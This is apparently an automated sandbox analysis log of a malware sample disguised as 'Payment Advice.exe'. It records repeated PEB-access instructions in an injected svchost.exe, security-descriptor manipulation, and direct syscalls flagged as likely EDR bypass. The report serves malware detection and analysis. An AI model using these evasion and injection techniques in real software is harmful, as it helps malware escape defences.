Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]	1_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]	1_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]	1_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]	1_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]	1_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]	1_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]	1_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]	1_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]	1_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]	1_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]	1_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]	1_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]	1_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]	1_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]	1_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]	1_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]	1_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]	1_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]	1_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]	1_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]	1_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]	1_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]	1_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]	1_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]	1_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]	1_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]	1_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]	1_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]	1_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]	1_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]	1_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]	1_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]	1_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]	1_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]	1_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]	1_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]	1_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]	1_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]	1_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]	1_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]	1_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]	1_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]	1_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]	1_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]	1_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]	1_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]	1_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]	1_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]	1_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]	1_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]	1_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]	1_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]	1_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]	1_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]	1_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]	1_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]	1_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]	1_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]	1_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]	1_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]	1_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]	1_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]	1_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]	1_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]	1_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]	1_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]	1_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]	1_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]	1_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]	1_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]	1_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]	1_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]	1_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]	1_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]	1_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]	1_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]	1_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]	1_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]	1_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]	1_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]	1_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]	1_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]	1_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]	1_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]	1_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]	1_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]	1_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]	1_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]	1_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]	1_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]	1_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]	1_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]	1_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]	1_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]	1_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]	1_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]	1_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]	1_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]	1_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]	1_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]	1_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]	1_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]	1_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]	1_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]	1_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]	1_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]	1_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]	1_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]	1_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]	1_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]	1_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]	1_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]	1_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]	1_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]	1_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]	1_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]	1_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]	1_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]	1_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]	1_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]	1_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]	1_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]	1_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]	1_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]	1_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]	1_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]	1_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]	1_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]	1_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]	1_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]	1_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]	1_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]	1_2_0346A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]	1_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]	1_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]	1_2_0345E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]	1_2_035008C0

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_005BA66C

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A8189 SetUnhandledExceptionFilter,		0_2_005A8189
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_005A81AC

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtClose: Direct from: 0x76F02B6C
